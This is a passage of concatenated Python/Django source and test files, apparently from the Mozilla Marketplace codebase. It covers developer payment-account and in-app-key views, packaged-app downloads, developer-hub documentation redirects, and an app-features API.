        app_names = u', '.join(unicode(app.name) for app in associated_apps)
        app_payment_accounts = json.dumps(dict([payment_account_names(app)
                                                for app in associated_apps]))
        provider = acc.get_provider()
        data = {
            'account-url': reverse('mkt.developers.provider.payment_account',
                                   args=[acc.pk]),
            'agreement-url': acc.get_agreement_url(),
            'agreement': 'accepted' if acc.agreed_tos else 'rejected',
            'current-app-name': jinja2.escape(app_name),
            'app-names': jinja2.escape(app_names),
            'app-payment-accounts': jinja2.escape(app_payment_accounts),
            'delete-url': reverse(
                'mkt.developers.provider.delete_payment_account',
                args=[acc.pk]),
            'id': acc.pk,
            'name': jinja2.escape(unicode(acc)),
            'provider': provider.name,
            'provider-full': unicode(provider.full),
            'shared': acc.shared,
            'portal-url': provider.get_portal_url(app_slug)
        }
        return data

    return map(account, accounts)
@login_required
def payment_accounts_form(request):
    """Render the account-list form fragment for one payment provider."""
    webapp = get_object_or_404(Webapp, app_slug=request.GET.get('app_slug'))
    wanted = get_provider(name=request.GET.get('provider'))
    formset = forms_payments.AccountListFormSet(
        provider_data=[{'user': request.amo_user,
                        'addon': webapp,
                        'provider': p}
                       for p in get_providers()])
    # Pick the single form belonging to the requested provider.
    account_list_form = next(f for f in formset.forms
                             if f.provider.name == wanted.name)
    return render(request,
                  'developers/payments/includes/bango_accounts_form.html',
                  {'account_list_form': account_list_form})
@write
@post_required
@login_required
@json_view
def payments_accounts_add(request):
    """Create a new payment account with the selected provider.

    Returns the new account's pk and agreement URL, or a 400 carrying the
    upstream error body when the payment backend rejects the request.
    """
    provider = get_provider(name=request.POST.get('provider'))
    form = provider.forms['account'](request.POST)
    if not form.is_valid():
        return json_view.error(form.errors)

    try:
        obj = provider.account_create(request.amo_user, form.cleaned_data)
    except HttpClientError as e:
        log.error('Client error create {0} account: {1}'.format(
            provider.name, e))
        return http.HttpResponseBadRequest(json.dumps(e.content))

    return {'pk': obj.pk, 'agreement-url': obj.get_agreement_url()}
@write
@login_required
@json_view
def payments_account(request, id):
    """Retrieve (and on POST, first update) one of the user's accounts."""
    account = get_object_or_404(PaymentAccount, pk=id, user=request.user)
    provider = account.get_provider()
    if request.POST:
        form = provider.forms['account'](request.POST, account=account)
        if not form.is_valid():
            return json_view.error(form.errors)
        form.save()
    return provider.account_retrieve(account)
@write
@post_required
@login_required
def payments_accounts_delete(request, id):
    """Cancel a payment account, detaching references to it.

    Responds 409 when the account cannot be cancelled.
    """
    account = get_object_or_404(PaymentAccount, pk=id, user=request.user)
    try:
        account.cancel(disable_refs=True)
    except CantCancel:
        log.info('Could not cancel account.')
        return http.HttpResponse('Cannot cancel account', status=409)
    else:
        log.info('Account cancelled: %s' % id)
        return http.HttpResponse('success')
@login_required
def in_app_keys(request):
    """
    Allows developers to get a simulation-only key for in-app payments.
    This key cannot be used for real payments.
    """
    keys = UserInappKey.objects.no_cache().filter(
        solitude_seller__user=request.amo_user
    )

    # TODO(Kumar) support multiple test keys. For now there's only one.
    key = None
    key_public_id = None

    if keys.exists():
        key = keys.get()

        # Attempt to retrieve the public id from solitude
        try:
            key_public_id = key.public_id()
        except HttpClientError, e:
            # Solitude is unreachable: surface an error but still render.
            messages.error(request,
                           _('A server error occurred '
                             'when retrieving the application key.'))
            log.exception('Solitude connection error: {0}'.format(e.message))

    if request.method == 'POST':
        # POST resets the existing key's secret, or creates the key.
        if key:
            key.reset()
            messages.success(request, _('Secret was reset successfully.'))
        else:
            UserInappKey.create(request.amo_user)
            messages.success(request,
                             _('Key and secret were created successfully.'))
        return redirect(reverse('mkt.developers.apps.in_app_keys'))

    return render(request, 'developers/payments/in-app-keys.html',
                  {'key': key, 'key_public_id': key_public_id})
@login_required
def in_app_key_secret(request, pk):
    """Return the secret for one of the user's simulation in-app keys."""
    keys = UserInappKey.objects.no_cache().filter(
        solitude_seller__user=request.amo_user, pk=pk)
    if keys.count():
        return http.HttpResponse(keys.get().secret())
    # Either the record does not exist or it's not owned by the
    # logged in user.
    return http.HttpResponseForbidden()
def require_in_app_payments(render_view):
    """Decorator ensuring the app is fully set up for in-app payments.

    Redirects to the payments setup page with an error message when the
    app is not configured for in-app purchases or has no payment account.
    """
    @functools.wraps(render_view)
    def inner(request, addon_id, addon, *args, **kwargs):
        setup_url = reverse('mkt.developers.apps.payments',
                            args=[addon.app_slug])
        if addon.premium_type not in amo.ADDON_INAPPS:
            messages.error(
                request,
                _('Your app is not configured for in-app payments.'))
            return redirect(setup_url)
        if not addon.has_payment_account():
            messages.error(request, _('No payment account for this app.'))
            return redirect(setup_url)

        # App is set up for payments; render the view.
        return render_view(request, addon_id, addon, *args, **kwargs)
    return inner
@waffle_switch('in-app-products')
@login_required
@dev_required(webapp=True)
@require_in_app_payments
def in_app_products(request, addon_id, addon, webapp=True, account=None):
    """List the app's in-app products and render the add-product form."""
    owner = acl.check_addon_ownership(request, addon)
    products = addon.inappproduct_set.all()
    new_product = InAppProduct(webapp=addon)
    form = InAppProductForm()
    # Fixed: 'form' previously appeared twice in this context dict; the
    # duplicate key was silently collapsed by the dict literal.
    return render(request, 'developers/payments/in-app-products.html',
                  {'addon': addon, 'form': form, 'new_product': new_product,
                   'owner': owner, 'products': products})
@login_required
@dev_required(owner_for_post=True, webapp=True)
@require_in_app_payments
def in_app_config(request, addon_id, addon, webapp=True):
    """
    Allows developers to get a key/secret for doing in-app payments.
    """
    config = get_inapp_config(addon)

    owner = acl.check_addon_ownership(request, addon)
    if request.method == 'POST':
        # Reset the in-app secret for the app.
        (client.api.generic
               .product(config['resource_pk'])
               .patch(data={'secret': generate_key(48)}))
        messages.success(request, _('Changes successfully saved.'))
        return redirect(reverse('mkt.developers.apps.in_app_config',
                                args=[addon.app_slug]))

    return render(request, 'developers/payments/in-app-config.html',
                  {'addon': addon, 'owner': owner,
                   'seller_config': config})
@login_required
@dev_required(webapp=True)
@require_in_app_payments
def in_app_secret(request, addon_id, addon, webapp=True):
    """Return the app's in-app payment secret as a plain-text response."""
    return http.HttpResponse(get_inapp_config(addon)['secret'])
def get_inapp_config(addon):
    """
    Returns a generic Solitude product, the app's in-app configuration.

    We use generic products in Solitude to represent an "app" that is
    enabled for in-app purchases.
    """
    public_id = addon.solitude_public_id
    if public_id:
        return client.api.generic.product.get_object(public_id=public_id)
    # If the view accessing this method uses all the right
    # decorators then this error won't be raised.
    raise ValueError('The app {a} has not yet been configured '
                     'for payments'.format(a=addon))
@dev_required(webapp=True)
def bango_portal_from_addon(request, addon_id, addon, webapp=True):
    """Log the requesting user into the Bango portal for this app.

    Access requires the user to be an owner-role author of the app AND
    the owner of the app's Bango payment account; otherwise 403.
    """
    try:
        bango = addon.payment_account(PROVIDER_BANGO)
    except addon.PayAccountDoesNotExist:
        log.error('Bango portal not available for app {app} '
                  'with accounts {acct}'
                  .format(app=addon,
                          acct=list(addon.all_payment_accounts())))
        return http.HttpResponseForbidden()
    else:
        account = bango.payment_account

    if not ((addon.authors.filter(
             pk=request.user.pk,
             addonuser__role=amo.AUTHOR_ROLE_OWNER).exists()) and
            (account.solitude_seller.user.id == request.user.id)):
        log.error(('User not allowed to reach the Bango portal; '
                   'pk=%s') % request.user.pk)
        return http.HttpResponseForbidden()

    return _redirect_to_bango_portal(account.account_id,
                                     'addon_id: %s' % addon_id)
def _redirect_to_bango_portal(package_id, source):
    """Authenticate against Bango, then hand the portal URL to the client.

    ``source`` is only used for log context.  On auth failure the
    upstream error body is returned as a 400.
    """
    try:
        bango_token = client.api.bango.login.post({'packageId':
                                                   int(package_id)})
    except HttpClientError as e:
        log.error('Failed to authenticate against Bango portal; %s' % source,
                  exc_info=True)
        return http.HttpResponseBadRequest(json.dumps(e.content))

    bango_url = '{base_url}{parameters}'.format(**{
        'base_url': settings.BANGO_BASE_PORTAL_URL,
        'parameters': urllib.urlencode({
            'authenticationToken': bango_token['authentication_token'],
            'emailAddress': bango_token['email_address'],
            'packageId': package_id,
            'personId': bango_token['person_id'],
        })
    })
    # NOTE(review): 204 + Location rather than a 302 — presumably the
    # frontend JS opens the URL itself; confirm with the consumer.
    response = http.HttpResponse(status=204)
    response['Location'] = bango_url
    return response
# TODO(andym): move these into a DRF API.
@login_required
@json_view
def agreement(request, id):
    """Fetch (GET) or update (POST) a payment account's terms of service."""
    account = get_object_or_404(PaymentAccount, pk=id, user=request.user)
    provider = account.get_provider()
    handler = (provider.terms_update if request.method == 'POST'
               else provider.terms_retrieve)
    return handler(account)
########NEW FILE########
__FILENAME__ = test_views
from django.conf import settings
from django.core.urlresolvers import reverse
import mock
from nose import SkipTest
from nose.tools import eq_
import amo
from lib.crypto import packaged
from lib.crypto.tests import mock_sign
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BasePackagedAppTest
class TestDownload(BasePackagedAppTest):
    """Tests serving packaged-app downloads across app/file states."""
    fixtures = ['base/apps', 'base/users', 'base/platforms'
                ] + fixture('webapp_337141')

    def setUp(self):
        super(TestDownload, self).setUp()
        super(TestDownload, self).setup_files()
        self.url = reverse('downloads.file', args=[self.file.pk])

    @mock.patch.object(packaged, 'sign', mock_sign)
    def test_download(self):
        # The header assertion is only meaningful with XSENDFILE on.
        if not settings.XSENDFILE:
            raise SkipTest
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        assert settings.XSENDFILE_HEADER in res

    def test_disabled(self):
        self.app.update(status=amo.STATUS_DISABLED)
        eq_(self.client.get(self.url).status_code, 404)

    def test_not_public(self):
        self.file.update(status=amo.STATUS_PENDING)
        eq_(self.client.get(self.url).status_code, 404)

    @mock.patch('lib.crypto.packaged.sign')
    def test_not_public_but_owner(self, sign):
        # Owners get the unsigned package; no signing call happens.
        self.client.login(username='[email protected]',
                          password='password')
        self.file.update(status=amo.STATUS_PENDING)
        eq_(self.client.get(self.url).status_code, 200)
        assert not sign.called

    @mock.patch('lib.crypto.packaged.sign')
    def test_not_public_not_owner(self, sign):
        self.client.login(username='[email protected]',
                          password='password')
        self.file.update(status=amo.STATUS_PENDING)
        eq_(self.client.get(self.url).status_code, 404)

    @mock.patch.object(packaged, 'sign', mock_sign)
    def test_disabled_but_owner(self):
        self.client.login(username='[email protected]',
                          password='password')
        eq_(self.client.get(self.url).status_code, 200)

    @mock.patch.object(packaged, 'sign', mock_sign)
    def test_disabled_but_admin(self):
        self.client.login(username='[email protected]',
                          password='password')
        eq_(self.client.get(self.url).status_code, 200)

    def test_not_webapp(self):
        self.app.update(type=amo.ADDON_EXTENSION)
        eq_(self.client.get(self.url).status_code, 404)

    @mock.patch.object(packaged, 'sign', mock_sign)
    def test_file_blocklisted(self):
        # Blocked files are served like public ones so users get updates.
        if not settings.XSENDFILE:
            raise SkipTest
        self.file.update(status=amo.STATUS_BLOCKED)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        assert settings.XSENDFILE_HEADER in res
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from mkt.downloads import views
# URL routes for serving packaged-app downloads.
urlpatterns = patterns('',
    # .* at the end to match filenames.
    # /file/:id/type:attachment
    url('^file/(?P<file_id>\d+)(?:/type:(?P<type>\w+))?(?:/.*)?',
        views.download_file, name='downloads.file'),
)
########NEW FILE########
__FILENAME__ = views
from django import http
from django.shortcuts import get_object_or_404
import commonware.log
import amo
from access import acl
from amo.utils import HttpResponseSendFile
from files.models import File
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.downloads')
def download_file(request, file_id, type=None):
    """Serve a (signed) packaged-app zip for download.

    Disabled apps/files are only served to users with viewer access;
    blocked files are treated like public files so users receive the
    blocklist update; non-public files require dev-level ownership.
    """
    # Local renamed from `file` to avoid shadowing the builtin.
    file_ = get_object_or_404(File, pk=file_id)
    webapp = get_object_or_404(Webapp, pk=file_.version.addon_id,
                               is_packaged=True)

    if webapp.is_disabled or file_.status == amo.STATUS_DISABLED:
        if not acl.check_addon_ownership(request, webapp, viewer=True,
                                         ignore_disabled=True):
            raise http.Http404()

    # We treat blocked files like public files so users get the update.
    if file_.status in [amo.STATUS_PUBLIC, amo.STATUS_BLOCKED]:
        path = webapp.sign_if_packaged(file_.version_id)
    else:
        # This is someone asking for an unsigned packaged app.
        if not acl.check_addon_ownership(request, webapp, dev=True):
            raise http.Http404()
        path = file_.file_path

    log.info('Downloading package: %s from %s' % (webapp.id, path))
    return HttpResponseSendFile(request, path, content_type='application/zip',
                                etag=file_.hash.split(':')[-1])
########NEW FILE########
__FILENAME__ = models
########NEW FILE########
__FILENAME__ = test_views
from django.core.urlresolvers import reverse
import basket
import mock
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo.tests
# Ecosystem pages rendered directly by our own templates.
VIEW_PAGES = (
    'design_ui', 'dev_phone', 'partners', 'publish_deploy', 'support'
)

# Legacy ecosystem pages that now permanently redirect (301) elsewhere.
REDIRECT_PAGES = (
    'build_apps_offline', 'build_ffos', 'build_game_apps', 'build_intro',
    'build_manifests', 'build_mobile_developers', 'build_quick',
    'build_reference', 'build_web_developers', 'design_concept',
    'design_fundamentals', 'design_patterns', 'ffos_guideline',
    'publish_hosted', 'publish_packaged', 'publish_review', 'publish_submit',
    'responsive_design', 'firefox_os_simulator', 'build_payments',
    'publish_payments', 'build_app_generator', 'build_dev_tools', 'build_tools',
    'app_manager'
)
class TestLanding(amo.tests.TestCase):
    """Tests for the developer-hub landing page and its newsletter form."""

    def setUp(self):
        self.url = reverse('ecosystem.landing')

    def test_legacy_redirect(self):
        r = self.client.get('/ecosystem/')
        self.assert3xx(r, '/developers/', 301)

    def test_tutorials_default(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        self.assertTemplateUsed(r, 'ecosystem/landing.html')

    @mock.patch('basket.subscribe')
    def test_newsletter_form_valid(self, subscribe_mock):
        d = {'email': '[email protected]', 'email_format': 'T', 'privacy': True,
             'country': 'us'}
        r = self.client.post(self.url, d)
        self.assert3xx(r, reverse('ecosystem.landing'))
        assert subscribe_mock.called

    @mock.patch('basket.subscribe')
    def test_newsletter_form_invalid(self, subscribe_mock):
        d = {'email': '', 'email_format': 'T', 'privacy': True,
             'country': 'us'}
        r = self.client.post(self.url, d)
        eq_(r.status_code, 200)
        self.assertFormError(r, 'newsletter_form', 'email',
                             [u'Please enter a valid email address.'])
        assert not subscribe_mock.called

    @mock.patch('basket.subscribe')
    def test_newsletter_form_exception(self, subscribe_mock):
        # Basket failures surface as a friendly error box, not a 500.
        subscribe_mock.side_effect = basket.BasketException
        d = {'email': '[email protected]', 'email_format': 'T', 'privacy': True,
             'country': 'us'}
        r = self.client.post(self.url, d)
        eq_(r.status_code, 200)
        eq_(pq(r.content)('.notification-box.error h2').text(),
            'We apologize, but an error occurred in our '
            'system. Please try again later.')
        assert subscribe_mock.called
class TestDevHub(amo.tests.TestCase):
    """Smoke tests for ecosystem content pages and MDN redirects."""

    def test_content_pages(self):
        for page in VIEW_PAGES:
            r = self.client.get(reverse('ecosystem.%s' % page))
            eq_(r.status_code, 200, '%s: status %s' % (page, r.status_code))
            self.assertTemplateUsed(r, 'ecosystem/%s.html' % page)

    def test_redirect_pages(self):
        for page in REDIRECT_PAGES:
            r = self.client.get(reverse('ecosystem.%s' % page))
            eq_(r.status_code, 301, '%s: status %s' % (page, r.status_code))

    def test_valid_reference_app(self):
        r = self.client.get(reverse('ecosystem.apps_documentation',
                                    args=['face_value']))
        eq_(r.status_code, 200)
        self.assertTemplateUsed(r, 'ecosystem/reference_apps/face_value.html')

    def test_invalid_reference_app(self):
        # Unknown reference apps 404 rather than rendering a blank page.
        r = self.client.get(reverse('ecosystem.apps_documentation',
                                    args=['face_value_invalid']))
        eq_(r.status_code, 404)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from django.views.generic import RedirectView
from . import views
def redirect_doc(uri):
    """Build a view that permanently redirects to an MDN docs page."""
    destination = 'https://developer.mozilla.org/docs%s' % uri
    return RedirectView.as_view(url=destination)
# Legacy developer-hub documentation URLs that now live on MDN; each one
# issues a permanent redirect via redirect_doc() but keeps its named URL
# so existing reverse() calls and templates continue to work.
redirect_patterns = patterns('',
    url('^docs/firefox_os_guideline$',
        redirect_doc('/Web/Apps/Design'),
        name='ecosystem.ffos_guideline'),
    url('^docs/responsive_design$',
        redirect_doc('/Web_Development/Mobile/Responsive_design'),
        name='ecosystem.responsive_design'),
    url('^docs/patterns$',
        redirect_doc('/Web/Apps/Design/Responsive_Navigation_Patterns'),
        name='ecosystem.design_patterns'),
    url('^docs/review$',
        redirect_doc('/Web/Apps/Publishing/Marketplace_review_criteria'),
        name='ecosystem.publish_review'),
    url('^docs/hosted$',
        redirect_doc('/Mozilla/Marketplace/Publish_options#Hosted_apps'),
        name='ecosystem.publish_hosted'),
    url('^docs/submission$',
        redirect_doc('/Web/Apps/Publishing/Submitting_an_app'),
        name='ecosystem.publish_submit'),
    url('^docs/packaged$',
        redirect_doc('/Web/Apps/Developing/Packaged_apps'),
        name='ecosystem.publish_packaged'),
    url('^docs/intro_apps$',
        redirect_doc('/Web/Apps/Quickstart/Build/Intro_to_open_web_apps'),
        name='ecosystem.build_intro'),
    url('^docs/firefox_os$',
        redirect_doc('/Mozilla/Firefox_OS'),
        name='ecosystem.build_ffos'),
    url('^docs/manifests$',
        redirect_doc('/Web/Apps/FAQs/About_app_manifests'),
        name='ecosystem.build_manifests'),
    url('^docs/apps_offline$',
        redirect_doc('/Web/Apps/Offline_apps'),
        name='ecosystem.build_apps_offline'),
    url('^docs/game_apps$',
        redirect_doc('/Web/Apps/Developing/Games'),
        name='ecosystem.build_game_apps'),
    url('^docs/mobile_developers$',
        redirect_doc('/Web/Apps/Quickstart/Build/For_mobile_developers'),
        name='ecosystem.build_mobile_developers'),
    url('^docs/web_developers$',
        redirect_doc('/Web/Apps/Quickstart/Build/For_Web_developers'),
        name='ecosystem.build_web_developers'),
    url('^docs/firefox_os_simulator$',
        redirect_doc('/Tools/Firefox_OS_Simulator'),
        name='ecosystem.firefox_os_simulator'),
    url('^docs/payments$',
        redirect_doc('/Web/Apps/Quickstart/Build/Payments'),
        name='ecosystem.build_payments'),
    url('^docs/concept$',
        redirect_doc('/Web/Apps/Quickstart/Design/Concept_A_great_app'),
        name='ecosystem.design_concept'),
    url('^docs/fundamentals$',
        redirect_doc('/Web/Apps/Quickstart/Design/Design_Principles'),
        name='ecosystem.design_fundamentals'),
    url('^docs/quick_start$',
        redirect_doc('/Web/Apps/Quickstart/Build/Your_first_app'),
        name='ecosystem.build_quick'),
    url('^docs/reference_apps$',
        redirect_doc('/Web/Apps/Reference_apps'),
        name='ecosystem.build_reference'),
    url('^docs/payments/status$',
        redirect_doc('/Mozilla/Marketplace/Payments_Status'),
        name='ecosystem.publish_payments'),
    url('^docs/tools$',
        redirect_doc('/Web/Apps/Quickstart/Build/App_tools'),
        name='ecosystem.build_tools'),
    url('^docs/app_generator$',
        redirect_doc('/Web/Apps/Developing/App_templates'),
        name='ecosystem.build_app_generator'),
    url('^docs/app_manager$',
        redirect_doc('/Mozilla/Firefox_OS/Using_the_App_Manager'),
        name='ecosystem.app_manager'),
    url('^docs/dev_tools$',
        redirect_doc('/Tools'),
        name='ecosystem.build_dev_tools'),
)
# Locally-rendered developer-hub pages, combined with the MDN redirects
# declared above so both sets resolve through this module.
urlpatterns = redirect_patterns + patterns('',
    url('^$', views.landing, name='ecosystem.landing'),
    url('^partners$', views.partners, name='ecosystem.partners'),
    url('^support$', views.support, name='ecosystem.support'),
    url('^dev_phone$', views.dev_phone, name='ecosystem.dev_phone'),
    url('^docs/ui_guidelines$', views.design_ui,
        name='ecosystem.design_ui'),
    url('^docs/deploy$', views.publish_deploy,
        name='ecosystem.publish_deploy'),
    url('^docs/badges$', views.publish_badges,
        name='ecosystem.publish_badges'),
    url('^docs/apps/(?P<page>\w+)?$', views.apps_documentation,
        name='ecosystem.apps_documentation'),
)
########NEW FILE########
__FILENAME__ = views
# -*- coding: utf-8 -*-
from django.conf import settings
from django.http import Http404
from django.shortcuts import redirect, render
import basket
import commonware.log
from session_csrf import anonymous_csrf
from tower import ugettext as _
from amo import messages
from mkt.developers.forms import DevNewsletterForm
log = commonware.log.getLogger('z.ecosystem')
@anonymous_csrf
def landing(request):
    """Developer Hub landing page: promo videos plus newsletter signup."""
    videos = [
        {'name': 'airbnb',
         'path': 'FirefoxMarketplace-airbnb-BR-RC-SD1%20640'},
        {'name': 'evernote',
         'path': 'FirefoxMarketplace-Evernote_BR-RC-SD1%20640'},
        {'name': 'uken',
         'path': 'FirefoxMarketplace-uken-BR-RC-SD1%20640'},
        {'name': 'soundcloud',
         'path': 'FirefoxMarketplace-Soundcloud-BR-RC-SD1%20640'},
        {'name': 'box',
         'path': 'FirefoxMarketplace_box-BR-RC-SD1%20640'},
    ]
    newsletter_form = DevNewsletterForm(request.LANG, request.POST or None)
    if request.method == 'POST' and newsletter_form.is_valid():
        cleaned = newsletter_form.cleaned_data
        try:
            basket.subscribe(cleaned['email'],
                             'app-dev',
                             format=cleaned['email_format'],
                             source_url=settings.SITE_URL)
            messages.success(request, _('Thank you for subscribing!'))
            return redirect('ecosystem.landing')
        except basket.BasketException as exc:
            # Basket is an external service; log and fall through so the
            # page re-renders with an error message instead of a 500.
            log.error(
                'Basket exception in ecosystem newsletter: %s' % exc)
            messages.error(
                request, _('We apologize, but an error occurred in our '
                           'system. Please try again later.'))
    return render(request, 'ecosystem/landing.html',
                  {'videos': videos, 'newsletter_form': newsletter_form})
def support(request):
    """Landing page for support."""
    ctx = {'page': 'support', 'category': 'build'}
    return render(request, 'ecosystem/support.html', ctx)
def partners(request):
    """Landing page for partners."""
    ctx = {'page': 'partners'}
    return render(request, 'ecosystem/partners.html', ctx)
def installation(request):
    """Landing page for installation."""
    ctx = {'page': 'installation', 'category': 'publish'}
    return render(request, 'ecosystem/installation.html', ctx)
def dev_phone(request):
    """Landing page for the developer phone."""
    ctx = {'page': 'dev_phone'}
    return render(request, 'ecosystem/dev_phone.html', ctx)
def design_ui(request):
    """Design - UI Guidelines page."""
    ctx = {'page': 'design_ui', 'category': 'design'}
    return render(request, 'ecosystem/design_ui.html', ctx)
def publish_deploy(request):
    """Publish - Deploying your app page."""
    ctx = {'page': 'publish_deploy', 'category': 'publish'}
    return render(request, 'ecosystem/publish_deploy.html', ctx)
def publish_badges(request):
    """Publish - Marketplace badges."""
    ctx = {'page': 'badges', 'category': 'publish'}
    return render(request, 'ecosystem/publish_badges.html', ctx)
def apps_documentation(request, page=None):
    """Page template for all reference apps.

    `page` must be one of the known reference-app slugs below; any other
    value 404s.  The context carries lookup tables of the third-party
    libraries, Web APIs and custom-element libraries that the individual
    reference-app templates link to.
    """
    if page not in ('chrono', 'face_value', 'podcasts', 'roller',
                    'webfighter', 'generalnotes', 'rtcamera'):
        raise Http404
    # Third-party JS/server libraries used by the reference apps.
    third_party_libs = {
        'node': {
            'link': 'http://nodejs.org/',
            'title': 'Node.js',
        },
        'zepto': {
            'link': 'http://zeptojs.com/',
            'title': 'zepto.js',
        },
        'backbone': {
            'link': 'http://backbonejs.org/',
            'title': 'backbone.js',
        },
        'redis': {
            'link': 'http://redis.io',
            'title': 'redis',
        },
        'volo': {
            'link': 'http://volojs.org/',
            'title': 'volo.js',
        },
        'jquery': {
            'link': 'http://jquery.com/',
            'title': 'jQuery',
        },
        'requirejs': {
            'link': 'http://requirejs.org/',
            'title': 'RequireJS',
        },
        'animated_gif': {
            'link': 'https://github.com/sole/Animated_GIF',
            'title': 'Animated GIF',
        },
        'async_storage': {
            'link': 'https://github.com/mozilla-b2g/gaia/blob/master/shared/js/async_storage.js',
            'title': 'Async Storage',
        },
        'glmatrix': {
            'link': 'http://glmatrix.net',
            'title': 'glMatrix',
        },
        'hammerjs': {
            'link': 'http://eightmedia.github.io/hammer.js',
            'title': 'hammer.js',
        }
    }
    # Web platform APIs; links are protocol-relative into MDN.
    web_api_libs = {
        'localstorage': {
            'link': '//developer.mozilla.org/docs/DOM/Storage#localStorage',
            'title': 'localStorage',
        },
        'appcache': {
            'link': '//developer.mozilla.org/docs/HTML/Using_the_application_cache',
            'title': 'appcache',
        },
        'open_web_apps': {
            'link': '//developer.mozilla.org/docs/Apps/Apps_JavaScript_API',
            'title': 'Open Web Apps',
        },
        'indexed_db': {
            'link': '//developer.mozilla.org/docs/IndexedDB',
            'title': 'IndexedDB',
        },
        'systemxhr': {
            'link': '//developer.mozilla.org/docs/DOM/XMLHttpRequest#Non-standard_properties',
            'title': 'systemXHR',
        },
        'canvas': {
            'link': '//developer.mozilla.org/docs/HTML/Canvas',
            'title': 'Canvas',
        },
        'fullscreen': {
            'link': '//developer.mozilla.org/docs/DOM/Using_fullscreen_mode',
            'title': 'Fullscreen'
        },
        'in_app_payments': {
            'link': '//developer.mozilla.org/docs/Web/Apps/Publishing/In-app_payments',
            'title': 'In-app Payments',
        },
        'blob': {
            'link': '//developer.mozilla.org/docs/Web/API/Blob',
            'title': 'Blob',
        },
        'url': {
            'link': '//developer.mozilla.org/docs/Web/API/window.URL',
            'title': 'URL',
        },
        'webgl': {
            'link': '//developer.mozilla.org/docs/Web/WebGL',
            'title': 'WebGL',
        },
        'webrtc': {
            'link': '//developer.mozilla.org/docs/WebRTC',
            'title': 'WebRTC',
        },
        'getusermedia': {
            'link': '//developer.mozilla.org/docs/Web/API/Navigator.getUserMedia',
            'title': 'getUserMedia',
        },
        'webworkers': {
            'link': '//developer.mozilla.org/docs/Web/API/Worker',
            'title': 'Web Workers',
        },
        'xmlhttprequest': {
            'link': '//developer.mozilla.org/docs/Web/API/XMLHttpRequest',
            'title': 'XMLHttpRequest',
        }
    }
    # Libraries providing reusable UI building blocks / custom elements.
    custom_elements_libs = {
        'gaia': {
            'link': 'https://wiki.mozilla.org/Gaia/Design/BuildingBlocks',
            'title': _('Gaia Building Blocks'),
        },
        'xtags': {
            'link': 'http://x-tags.org',
            'title': 'x-tags',
        }
    }
    ctx = {
        'page': page,
        'category': 'build',
        'third_party_libs': third_party_libs,
        'web_api_libs': web_api_libs,
        'custom_elements_libs': custom_elements_libs
    }
    return render(request, ('ecosystem/reference_apps/%s.html' % page), ctx)
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from mkt.webapps.models import AppFeatures
class AppFeaturesSerializer(serializers.ModelSerializer):
    """Serializes an AppFeatures row as a flat list of enabled features.

    Instead of the usual field-by-field representation, the output is the
    list of boolean ``has_*`` field names that are truthy on the instance,
    with the ``has_`` prefix stripped (e.g. ``['apps', 'audio']``).
    """
    class Meta:
        model = AppFeatures
        fields = []
        depth = 0
    def to_native(self, obj):
        # Filter on the prefix first (cheap) and strip it by slicing:
        # str.replace() would also mangle any later occurrence of 'has_'
        # inside a field name, not just the leading one.
        prefix = 'has_'
        return [f[len(prefix):] for f in obj._fields()
                if f.startswith(prefix) and getattr(obj, f)]
########NEW FILE########
__FILENAME__ = test_serializers
import amo.tests
from mkt.features.serializers import AppFeaturesSerializer
class TestAppFeaturesSerializer(amo.tests.TestCase):
    """Round-trip tests for the flattened AppFeatures representation."""

    def setUp(self):
        self.app = amo.tests.app_factory()
        self.serializer = AppFeaturesSerializer()

    def _test_features(self, expected_fields):
        # Serialize the app's feature flags and compare against the
        # expected 'has_*' field names.
        feature_flags = self.app.current_version.features
        serialized = self.serializer.to_native(feature_flags)
        self.assertSetEqual(['has_' + slug for slug in serialized],
                            expected_fields)

    def test_all_false(self):
        self._test_features([])

    def test_one_true(self):
        enabled = {'has_apps': True}
        self.app.current_version.features.update(**enabled)
        self._test_features(enabled.keys())

    def test_several_true(self):
        enabled = {'has_apps': True, 'has_video_webm': True}
        self.app.current_version.features.update(**enabled)
        self._test_features(enabled.keys())
########NEW FILE########
__FILENAME__ = test_views
import json
from nose.tools import eq_
from django.core.urlresolvers import reverse
from mkt.api.tests.test_oauth import RestOAuth
from mkt.constants.features import APP_FEATURES, FeatureProfile
class TestConfig(RestOAuth):
    """Tests for the read-only app-features listing endpoint."""
    def setUp(self):
        super(TestConfig, self).setUp()
        self.url = reverse('api-features-feature-list')
    def _test_response(self, res):
        # Every known feature must be listed, keyed by lower-cased name,
        # each carrying a stable 1-based 'position'.
        eq_(res.status_code, 200)
        data = res.json
        eq_(len(data), len(APP_FEATURES))
        self.assertSetEqual(data.keys(),
                            [f.lower() for f in APP_FEATURES.keys()])
        for i, feature in enumerate(APP_FEATURES.items()):
            name = feature[0].lower()
            eq_(i + 1, data[name]['position'])
    def test_with_profile(self):
        # Supplying a 'pro' signature adds a per-feature 'present' flag.
        profile = FeatureProfile(apps=True).to_signature()
        res = self.anon.get(self.url, {'pro': profile})
        self._test_response(res)
        eq_(res.json['apps']['present'], True)
        eq_(res.json['audio']['present'], False)
    def test_anon(self):
        res = self.anon.get(self.url)
        self._test_response(res)
    def test_authenticated(self):
        res = self.client.get(self.url)
        self._test_response(res)
    def test_post(self):
        # The endpoint is read-only.
        res = self.client.post(self.url)
        eq_(res.status_code, 405)
########NEW FILE########
__FILENAME__ = utils
from mkt.constants.features import FeatureProfile
def get_feature_profile(request):
    """Return a FeatureProfile decoded from the request, or None.

    The 'pro' querystring signature is only honoured when the 'dev'
    parameter names a known device type; missing or malformed signatures
    are silently ignored.
    """
    if request.GET.get('dev') not in ('firefoxos', 'android'):
        return None
    signature = request.GET.get('pro')
    if not signature:
        return None
    try:
        return FeatureProfile.from_signature(signature)
    except ValueError:
        # Bad signature: behave as if none was supplied.
        return None
########NEW FILE########
__FILENAME__ = views
from ordereddict import OrderedDict
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from mkt.api.base import CORSMixin
from mkt.constants.features import APP_FEATURES, FeatureProfile
class AppFeaturesList(CORSMixin, APIView):
    """Read-only listing of every app feature the platform knows about."""
    # Open endpoint: no authentication and no permission checks.
    authentication_classes = permission_classes = []
